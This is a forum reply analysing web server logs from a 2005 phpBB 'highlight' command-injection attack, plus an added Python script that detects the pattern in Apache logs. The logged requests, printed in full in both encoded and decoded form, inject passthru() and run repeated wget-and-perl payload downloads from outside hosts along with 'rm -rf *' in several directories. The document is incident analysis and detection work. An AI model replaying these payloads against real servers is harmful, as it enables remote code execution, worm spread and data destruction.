get%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/pr
oxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
is
GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 
65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527
GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
is
GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
If run, it does try to download a file into dirs and run it.
In your case the try on "/usr/local/apache/proxy/" did work, so you got the files in there. Unfortunately none of the URLs above works, so I can't find out what the perl scripts do; I guess they download more files and do something else.
Someone might have used this script to exploit you:
http://www.k-otik.com/exploits/20041...pbb2010.pl.php
You're sure it's vBB 3.0.5? Looks like the phpBB highlight exploit code.
Last edited by sehe; 01-12-2005 at 03:26 PM.
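A detection pass over domlog entries of the kind quoted in this thread, written here as an added example (it is not sehe's or the original poster's code): it URL-decodes each request twice, flags the passthru() call spliced into highlight= through the double-encoded quote, pulls the shell command out of rush=, and lists which hosts it fetches from and which directories it changes into, so every hit with a 200 can be followed up on disk. The log lines inside are constructed samples in the same grep-prefixed format, with documentation addresses in place of the ones in the thread.

```python
"""Spot the phpBB 'highlight' command-injection pattern in Apache logs.

Added example, not code from the original thread.  It looks for the request
shape quoted there: a double-encoded quote (%2527 -> %27 -> ') that splices
passthru($HTTP_GET_VARS[rush]) into the highlight parameter, with the shell
command carried in rush=.  The sample log lines are constructed, using
documentation addresses in place of the real ones from the thread.
"""
import re
from urllib.parse import unquote

# Apache combined log, optionally prefixed by "<file>:" as grep -H prints it.
LOG_RE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
    r'(?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A quote closing the PHP string, then a call that runs a shell command.
INJECT_RE = re.compile(r"'\s*\.\s*(passthru|system|exec|shell_exec)\s*\(", re.I)
# Which GET variable the injected call reads, e.g. $HTTP_GET_VARS[rush].
CMD_VAR_RE = re.compile(r"\[\s*'?(\w+)'?\s*\]")
# Remote hosts the command fetches from, and directories it drops into.
FETCH_RE = re.compile(r"\b(?:wget|curl|lynx|fetch)\s+(?:-\S+\s+)*(?:https?://)?([\w.\-]+)")
CD_RE = re.compile(r"\bcd\s+([^\s;]+)")


def full_decode(value, rounds=3):
    """URL-decode until the string stops changing (the exploit encodes twice)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(target):
    """Split the query on '&' only; ';' belongs to the injected shell command."""
    params = {}
    for pair in target.partition("?")[2].split("&"):
        if pair:
            key, _, raw = pair.partition("=")
            params.setdefault(unquote(key), []).append(raw)
    return params


def analyse(line):
    """Return a finding for one log line if it carries the injection, else None."""
    match = LOG_RE.match(line.strip())
    if not match:
        return None
    rec = match.groupdict()
    params = query_params(rec["target"])
    highlight = full_decode(" ".join(params.get("highlight", [])))
    inject = INJECT_RE.search(highlight)
    if not inject:
        return None
    var = CMD_VAR_RE.search(highlight)
    cmd_param = var.group(1) if var else None
    # %0A newlines are used to break up the command; fold all whitespace.
    command = " ".join(full_decode(" ".join(params.get(cmd_param, []))).split())
    return {
        "ip": rec["ip"],
        "ts": rec["ts"],
        "script": rec["target"].partition("?")[0],
        "status": int(rec["status"]),
        "php_func": inject.group(1).lower(),
        "cmd_param": cmd_param,
        "command": command,
        "download_hosts": sorted(set(FETCH_RE.findall(command))),
        "dirs": sorted(set(CD_RE.findall(command))),
        "user_agent": rec["ua"],
    }


def scan(log_text):
    """Run analyse() over every line and keep the hits."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


# Constructed sample lines (not from the thread's real logs).
SAMPLE_LOG = r"""
/usr/local/apache/domlogs/domain.com:192.0.2.10 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;wget%20198.51.100.7/.zk/sess_deadbeef;perl%20sess_deadbeef;cd%20%20/usr/local/apache/proxy/;wget%20198.51.100.7/.zk/sess_deadbeef;perl%20sess_deadbeef;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
/usr/local/apache/domlogs/domain.com:192.0.2.11 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Adl.example.invalid/bot.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
192.0.2.12 - - [11/Jan/2005:09:00:00 +0000] "GET /showthread.php?t=440&highlight=fuzzy HTTP/1.1" 200 2864 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['script']} status={hit['status']} "
              f"{hit['php_func']}({hit['cmd_param']}) fetches from "
              f"{hit['download_hosts']} into {hit['dirs']}")
```

Feed it the output of grep -i wget across the domlogs; the third sample line is a normal search with highlight=fuzzy and is not reported, which is the false-positive case a plain grep for "highlight" would trip on.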